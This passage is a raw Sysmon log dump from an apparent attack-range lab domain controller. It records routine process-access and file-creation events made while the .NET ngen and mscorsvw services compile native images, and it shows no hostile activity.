13:47:39.437{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:39.421{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917B-6005-A102-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:39.343{59A5CD1D-917A-6005-A002-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5e8-0\System.ServiceModel.Activation.dll2021-01-18 13:47:39.343 10341000x80000000000000006834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.796{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:41.796{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.655{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.655{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A502-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:41.593{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9d0-0\System.ServiceModel.Channels.dll2021-01-18 13:47:41.593 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.233{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.218{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:41.218{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A402-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:41.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917D-6005-A302-00000000A301}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:41.030{59A5CD1D-917B-6005-A202-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b7c-0\System.ServiceModel.Activities.dll2021-01-18 13:47:41.030 10341000x80000000000000006841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:42.671{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.608{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.608{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:42.530{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\2d8-0\System.ServiceModel.Discovery.dll2021-01-18 13:47:42.530 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.921{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.921{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:43.921{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\n